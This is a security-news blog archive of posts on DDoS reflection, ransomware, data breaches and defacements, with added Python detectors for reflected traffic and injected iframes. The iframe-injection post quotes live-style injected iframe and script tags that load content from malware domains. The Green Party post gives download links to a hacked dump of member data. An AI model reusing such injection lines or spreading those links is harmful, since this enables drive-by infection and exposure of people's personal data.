Showing posts with label Website Attack.

DoS Attackers are Employing ‘TCP Middlebox Reflection’ to Knock Websites Offline

 


Distributed denial-of-service (DDoS) hackers are employing a new amplification technique called TCP Middlebox Reflection to target websites. Last week, researchers at Akamai, a content distribution network firm, detected the novel attack methodology for the first time in the wild, six months after the technique was published in theory. 

"The attack […] abuses vulnerable firewalls and content filtering systems to reflect and amplify TCP traffic to a victim machine, creating a powerful DDoS attack," Akamai researchers stated in a blog post. "This type of attack dangerously lowers the bar for DDoS attacks, as the attacker needs as little as 1/75th (in some cases) the amount of bandwidth from a volumetric standpoint."

Most DDoS attacks have traditionally abused the User Datagram Protocol (UDP) for amplification: the attacker sends packets to a server that replies with a larger packet, and that reply is delivered to the victim. In these attacks, the attacker sends thousands of DNS or NTP requests carrying a forged source IP address, that of the victim, so the server returns its amplified responses to the spoofed address and exhausts the bandwidth available to the target.

The amplification technique was published in a research paper in August 2021, which showed that malicious actors could exploit middleboxes such as firewalls via TCP to magnify denial of service attacks.  

While UDP reflection vectors have traditionally been used in DoS amplification attacks because of the protocol's connectionless nature, the novel approach exploits TCP non-compliance in middleboxes such as deep packet inspection (DPI) tools to launch TCP-based reflective amplification attacks.

The first wave of this novel campaign is said to have occurred around February 17, targeting Akamai customers across banking, travel, gaming, media, and web hosting industries with high amounts of traffic that peaked at 11 Gbps at 1.5 million packets per second (Mpps).  

"The vector has been seen used alone and as part of multi-vector campaigns, with the sizes of the attacks slowly climbing," Chad Seaman, lead of the security intelligence research team (SIRT) at Akamai, explained.  

The basic idea behind TCP-based reflection is to abuse the middleboxes used to enforce censorship laws and enterprise content-filtering policies by sending specially crafted TCP packets that trigger a volumetric response. In some cases, Akamai observed that a single SYN packet with a 33-byte payload triggered a 2,156-byte response, effectively achieving an amplification factor of 65x (6,533%).

"The main takeaway is that the new vector is starting to see real world abuse in the wild. Typically, this is a signal that more widespread abuse of a particular vector is likely to follow as knowledge and popularity grows across the DDoS landscape and more attackers begin to create tooling to leverage the new vector," Seaman explained.
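As an added, defender-side illustration (not code from Akamai or the original post): a victim-network heuristic that flags inbound TCP segments belonging to no handshake the victim took part in, which is how reflected middlebox responses look on the wire, alongside the 33-byte to 2,156-byte ratio quoted above. The packet records, ports and IP addresses are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Pkt:
    """One TCP segment summary (constructed for this example)."""
    src: str
    dst: str
    sport: int
    dport: int
    flags: str   # "S" = SYN, "SA" = SYN/ACK, "PA" = PSH/ACK, "R" = RST
    length: int  # bytes on the wire


def amplification_factor(request_bytes, response_bytes):
    """Reflected bytes per byte the attacker actually had to send."""
    return response_bytes / request_bytes


def unsolicited_tcp_bytes(packets, victim, min_sources=3):
    """Bytes of non-SYN TCP traffic reaching `victim` from hosts it never
    handshook with. Reflected middlebox responses (SYN/ACK, data or RST)
    belong to no connection the victim opened or accepted, so record every
    handshake the victim took part in and flag the rest. Returns
    {source_ip: bytes}, but only once `min_sources` distinct hosts appear."""
    known = set()  # (remote_ip, remote_port, local_port)
    for p in packets:
        if p.flags == "S" and p.src == victim:    # victim opened it
            known.add((p.dst, p.dport, p.sport))
        elif p.flags == "S" and p.dst == victim:  # a client opened it
            known.add((p.src, p.sport, p.dport))
    per_source = defaultdict(int)
    for p in packets:
        if p.dst == victim and p.flags != "S" \
                and (p.src, p.sport, p.dport) not in known:
            per_source[p.src] += p.length
    return dict(per_source) if len(per_source) >= min_sources else {}


# Constructed sample: two legitimate connections plus three reflected
# 2,156-byte responses (the size Akamai reported) from middleboxes.
VICTIM = "192.0.2.10"
SAMPLE = [
    Pkt(VICTIM, "198.51.100.5", 40000, 443, "S", 60),
    Pkt("198.51.100.5", VICTIM, 443, 40000, "SA", 60),
    Pkt("198.51.100.77", VICTIM, 51000, 80, "S", 60),
    Pkt("198.51.100.77", VICTIM, 51000, 80, "PA", 500),
    Pkt("203.0.113.1", VICTIM, 80, 33444, "PA", 2156),
    Pkt("203.0.113.2", VICTIM, 80, 41020, "PA", 2156),
    Pkt("203.0.113.3", VICTIM, 80, 52811, "R", 2156),
]
```

On a real capture the handshake table must be built before the attack starts, so the check is only as good as the flow history behind it.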

Ransomware Attack Hits Sandhills Online Machinery Market

 

Sandhills Global, a leading industry publication, has been hit by a ransomware assault, resulting in hosted websites being unavailable and affecting their company operations. 

Sandhills Global is a trade publishing and hosting firm headquartered in the United States that serves the transportation, agriculture, aircraft, heavy machinery, and technology industries. 

The firm offers a variety of printed and online trade magazines that include industry news as well as a marketplace for dealers to sell relevant new and old machinery. 

Sandhills Global's website and all of their hosted publications went offline on October 1, and their phones stopped working. Users are presented with a Cloudflare Origin DNS error page while attempting to access websites hosted on Sandhills' platform, suggesting that Cloudflare is unable to connect to Sandhills' servers. 

Several sources have informed BleepingComputer that the disruptions are the result of a Conti ransomware assault. This attack reportedly happened in the early morning on Thursday, leading the firm to take down all of its IT systems to stop the escalation of the attack.

Over the years, the Conti ransomware group has been involved in a large number of attacks, including high-profile operations targeting JVCKenwood, the City of Tulsa, Ireland's Health Service Executive (HSE), and Advantech. 

When carrying out assaults, the Conti group generally steals files before encrypting devices to use them as extra leverage during extortion operations. They then demand multi-million dollar ransom payments in order to receive a decryptor and not leak stolen data. 

It is unclear how much Conti is demanding from Sandhills, or whether data was stolen during the attack. BleepingComputer has contacted Sandhills with questions about the attack but has not received a response.

While Sandhills Global has not responded to the email, a customer shared an email with BleepingComputer which confirmed the ransomware assault. 

The email stated, “Sandhills Global is currently responding to a ransomware attack that impacted our operations. Systems and operations have been temporarily shut down to protect data and information, and we have retained cybersecurity experts to assist us with the investigation, which is ongoing. We are working actively and diligently with the assistance of our retained experts to fully restore operations. At this time, we are continuing to investigate whether any of our client's information has been accessed or impacted by this incident. 

At this time, we have not discovered evidence that confirms that customer information has been compromised. Please know that our clients are our number one priority and we are working diligently to restore operations and remediate the attack. At this time, our ability to respond to your messages may be delayed. 

We appreciate your patience and deeply regret any inconvenience this may cause. We will provide updates regarding this matter and the status of our services as soon as possible.”

Mensa Website Hacked After Britain’s Smartest Folk Failed To Secure Passwords

 

British Mensa, popularly known as a society of people with high IQs, failed to secure the passwords on its website properly, resulting in a massive breach of sensitive credentials, including members' personal data.

According to a report in the FT, Eugene Hopkinson, the former director and technology officer at British Mensa, stated that the organization had failed to secure the data of its 18,000 members properly.

Hopkinson claimed that the stored passwords of Mensa members were not hashed, potentially allowing hackers to unscramble them. The incident became all the more serious this week when the society acknowledged it had been the victim of a cyber attack. Currently, the Mensa website is unavailable and displays a "site under maintenance" message.

A Mensa member told the FT that, in an emergency directors' meeting, "it was confirmed that the Mensa site had been hacked this morning, using the credentials of one of the organization's directors. It was also confirmed that there were lots of Mensa members' passwords stored in plain text. The society had sent him his password in plain text within the past year". Several stashes of Mensa members' credentials have also been posted on the Pastebin website, while some of the data has since been removed.

Hopkinson told the FT that the Mensa website held lots of sensitive information on its members, including payment details, instant messaging conversations, and IQ scores of both current members and failed applicants. "If a breach is found to have taken place, I have no faith that the [Mensa] board and office will report it adequately... or take sufficient mitigating action to prevent further harm," Hopkinson wrote in an open letter announcing his resignation. A fellow board member resigned in protest over the same issue. Meanwhile, a spokesperson for Mensa told the FT that data such as members' passwords had been encrypted and that the organization was in the process of hashing passwords.

The spokesperson also denied that passwords were ever sent out in plain text, and said the organization had handed details of the cyberattack to Britain's Information Commissioner with a view to pursuing a criminal investigation. Mensa is a non-profit organization open only to people who score highly on a standardized IQ test, at the 98th percentile.

Press Release from Freedom Fighters and the Green Party hacked

@ForFreed0m has released a press release and a dump of information from the Green Party in the name of #antisec.

This is what they said:
To every man, woman & child… We want an end to the glamorization of negativity in the media. We want an end to status symbols dictating our worth as individuals.

We want a meaningful and free universal education system. We want substance in the place of popularity. We will not compromise who we are to be accepted by the crowd. We want the invisible walls that separate by wealth, race & class to be torn down. We want to think our own thoughts. We will be responsible for our environment.

Dear internetz, today we bring you our release from “Freedom Fighters”. I laugh at the New World Order trying to enslave us via the media and politicians lying, we want an end to the biased press whom want to destroy our freedoms via fear. Fear is the way how the globalist’s want to control us, controlling our laws and establishing a police state which is what we are fighting against. We want our god given rights on privacy and being able to use our founding laws to control the government, not the government controlling us. We don’t want the government to be groping us in airports, we don’t want the government to enforce statutes to support the bankers but not support the citizens, we want a free government who listens to the citizens of the situating country and not listen to the globalist’s. This is why humans have revolutions for example: Libya. The Libya citizens fought up against the regime because they thought they were being suppressed and cruelly controlled. That is because we are humans and not robots, good day to you.

Our twitter: @ForFreed0m GO THERE FOR UPDATES

The Release Details:

Oh herro Green Party, we just hacked you #Antisec

FirstName LastName Address Address2 CityHome StateHome ZipHome Phone Ofice_Email Gender Ethnicity Sexuality Under30 Disabili Active

Good day ‘ole chaps

DOWNLOAD HERE: http://www.mediafire.com/?rjzt1sc1uvlt41d

Pastebin Link:http://pastebin.com/HeZt8kXP

South Korean Social network hack left 35 million users data at risk

The hack of the South Korean social network Cyworld has left the personal information of 35 million users at risk.

Names, email addresses, phone numbers and other details may have been obtained by the hackers.


South Korean police have reportedly launched an investigation into the Cyworld hack.

"By any standard this is a massive attack and one of many in recent months where the finger has been pointed at hackers based in China. It's too early to say whether this attack is politically motivated or merely an attempt to steal personal information for financial gain," The Register quoted Mark Darvill, director at security appliance firm AEP Networks, as saying.

South Korea has a population of approximately 49 million, which means more than 80% of the population may have been affected by this attack.

SPINNPHR hacked By Inj3ct0r


SPINN, Secure Personal Information and Notification Network, is a confidential and secure online service that allows you to access and organize your health information.

When I tried to visit SPINN's website (spinnnphr.com), the page displayed an image containing the text "INJ3CTOR".

It appears the hack was done by the inj3ct0r team. They placed a website link next to the SPINN logo.

I took a screenshot of the defaced website. At the time of writing, the website still shows the defacement page. Here is the screenshot I took:

90000 Web Pages Infected by Mass IFrame Injection

Security experts Wayne Huang, Chris Hsiao and NightCola Lin discovered a massive iframe injection attack on commerce websites. More than 90,000 websites are reported infected by this attack, and every infected page points to willysy.com.

Google indicates more than 90,000 infected pages (note it's pages not domains)


Massive injection:

Initially it was:

<iframe src="hxxp://willysy.com/images/banners/" style="position: absolute; visibility: hidden;"></iframe>

Later it became:

<script src="hxxp://exero.eu/catalog/jquery.js"></script>

According to Armorize, the infected websites redirect visitors to other malware domains, which then download malware onto the client system.
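An added example, not from Armorize or the original post: a small scanner a site owner could run over their own HTML to surface the two injected forms quoted above, an off-site hidden iframe and an off-site script tag. The sample page, the hostnames other than the two from the post, and the allow-list are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Style fragments that make an element invisible to the visitor.
HIDING_HINTS = ("visibility:hidden", "display:none")


class InjectionScanner(HTMLParser):
    """Collect <iframe> and <script> tags whose src points off-site.

    The campaign described above used a hidden <iframe> first and a bare
    <script src> later, so each finding records the tag, the host and
    whether the element was styled to be invisible."""

    def __init__(self, own_host, allowed_hosts=()):
        super().__init__()
        self.own_host = own_host.lower()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = dict(attrs)
        src = a.get("src") or ""
        # Defanged "hxxp://" still parses to a hostname, which is what we key on.
        host = (urlparse(src).hostname or "").lower()
        if host in ("", self.own_host) or host in self.allowed:
            return  # relative path, own domain or an allow-listed CDN
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = any(h in style for h in HIDING_HINTS) \
            or a.get("width") == "0" or a.get("height") == "0"
        self.findings.append({"tag": tag, "host": host, "hidden": hidden})


def scan_html(html, own_host, allowed_hosts=()):
    """Return a list of off-site iframe/script findings for one page."""
    scanner = InjectionScanner(own_host, allowed_hosts)
    scanner.feed(html)
    return scanner.findings


# Constructed page: a legitimate local script, an allow-listed CDN script,
# then both injected forms quoted in the post (defanged hxxp kept as-is).
SAMPLE_PAGE = """<html><body>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/jquery.js"></script>
<iframe src="hxxp://willysy.com/images/banners/" style="position: absolute; visibility: hidden;"></iframe>
<script src="hxxp://exero.eu/catalog/jquery.js"></script>
</body></html>"""
```

Run it against a saved copy of each page on a schedule and alert on any new host that is not on the allow-list; the hidden flag is a strong signal but the off-site host alone is worth reviewing.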

Screenshots of infected pages:

Video:

Source: Armorize

Hackers defaced PNRI website

Unknown hackers broke into the website of the Philippine Nuclear Research Institute (pnri.dost.gov.ph).

When users tried to visit the PNRI website, they got a pop-up message reading "Go PNoy. You can do it," instead of the normal page.

"Other popup messages included 'shouts' to hacker groups PrivateX, Philkers, Blackrain, and MjM," the GMA Network report reads.

Once users clicked the pop-up message, they were taken to the defacement page, which contained the logos of PrivateX and Philker, with music playing in the background.